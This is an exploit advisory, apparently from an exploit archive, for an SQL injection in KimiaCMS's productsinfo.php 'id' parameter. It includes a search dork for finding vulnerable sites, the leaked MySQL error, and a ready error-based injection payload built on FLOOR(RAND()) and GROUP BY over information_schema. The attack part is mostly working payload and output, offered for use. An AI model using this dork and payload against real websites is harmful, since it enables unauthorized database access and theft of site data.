+-------------------------------+------------------------------+
KimiaCMS ("productsinfo.php?id=") SQL Injection Vulnerability
Author: R3VAN_BASTARD (walkingdead@anotherdayanothercity.com)
HomePage: INDONESIA RAYA - JOGJA - WARUNG BOTO
+-------------------------------+------------------------------+
[X] VENDOR: http://www.kimia.co.za/
[X] DOWNLOAD: $$$
[X] Vulnerability: SQL INJECTION
[X] DORK: "Graphic design & Web design by Kimia"
+-------------------------------+------------------------------+
FILE: http://localhost/productsinfo.php?id=NULL

Error in sql statement!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL = UPDATE `catalogue-product-item` SET `number-of-views` = `number-of-views` + 1 WHERE id = NULL\'

EXPLOIT: http://localhost/productsinfo.php?id=NULL AND (SELECT 1227 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,118,97,58),(SELECT (CASE WHEN (1227=1227) THEN 1 ELSE 0 END)),CHAR(58,118,113,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+-------------------------------+------------------------------+
Thanks To: My Wife Listo.hurt - All my friends
+-------------------------------+------------------------------+